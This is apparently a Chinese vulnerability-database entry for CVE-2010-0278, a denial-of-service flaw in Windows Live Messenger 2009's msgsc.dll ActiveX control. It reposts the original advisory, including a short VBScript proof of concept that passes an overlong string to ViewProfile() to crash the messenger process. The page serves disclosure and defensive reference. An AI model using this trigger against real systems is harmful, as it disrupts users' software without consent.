Microsoft Windows Live Messenger 'msgsc.dll' ViewProfile()方式调用远程溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118880 漏洞类型 其他
发布时间 2010-01-08 更新时间 2010-01-13
CVE编号 CVE-2010-0278 CNNVD-ID CNNVD-201001-077
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/11070
https://cxsecurity.com/issue/WLB-2010010172
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-077
|漏洞详情
WindowsLiveMessenger是非常流行的即时通讯聊天工具。MSN所安装的msgsc.dllActivex控件没有正确地验证提交给ViewProfile()方式的参数,用户受骗访问了恶意网页并向该方式传送超长参数就可以触发缓冲区溢出,导致msnmsgr.exe进程崩溃。
|漏洞EXP
Product:
Windows Live Messenger 2009 (Build 14.0.8089.726)

************************************************************************
********
Vulnerability:
ActiveX - Denial of Service

************************************************************************
********
Discussion:
Vulnerability is in Activex Control(msgsc.14.0.8089.726.dll)
Sending a string to ViewProfile() , cause a crash on msnmsgr.exe
*must be signed in Msn Messenger account for triggerin the vulnerability.

************************************************************************
********
Vulnerable:
Windows Live Messenger 2009 on Windows Vista
Windows Live Messenger 2009 on Windows 7

Not Vulnerable:
Windows Live Messenger 2009 on Windows XP

Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - Österreich - Schweiz
www.hackattack.com

and

Natal Networks Inc.
Vulnerability Discovery, Penetration Testing, IT Security Consulting
www.natalnetworks.com

************************************************************************
********

Original Advisory
www.hackattack.com
www.natalnetworks.com

************************************************************************
********
PoC .wsf script:
'works on vista and windows7

<package>

<job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' />

<script language='vbscript'>

arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")

target.ViewProfile arg1

</script>

</job>

</package>

About HACKATTACK and Natal Networks
================
HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria
More Information about HACKATTACK at
http://www.hackattack.com

Natal Networks was founded by Hellcode Research Team in 2009.
Main mission of Natal Network is discover and research vulnerabilities.
Providing penetration tests and security auditing services.
More about; www.natalnetworks.com
|参考资料

来源:BID
名称:37680
链接:http://www.securityfocus.com/bid/37680
来源:BUGTRAQ
名称:20100108[HACKATTACKAdvisory080110]WindowsLiveMessenger2009ActiveXDoSVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/508811/100/0/threaded
来源:NSFOCUS
名称:14321
链接:http://www.nsfocus.net/vulndb/14321